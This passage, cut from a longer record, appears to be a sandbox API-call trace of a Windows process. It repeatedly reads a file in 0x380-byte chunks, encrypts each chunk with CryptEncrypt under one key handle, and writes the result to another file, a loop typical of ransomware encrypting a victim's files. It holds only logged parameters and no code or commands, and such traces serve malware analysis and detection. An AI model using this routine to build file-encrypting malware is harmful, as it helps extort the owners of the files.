lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.851] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.851] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.851] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.851] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.852] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.853] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.854] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.856] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.857] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] ReadFile (in: 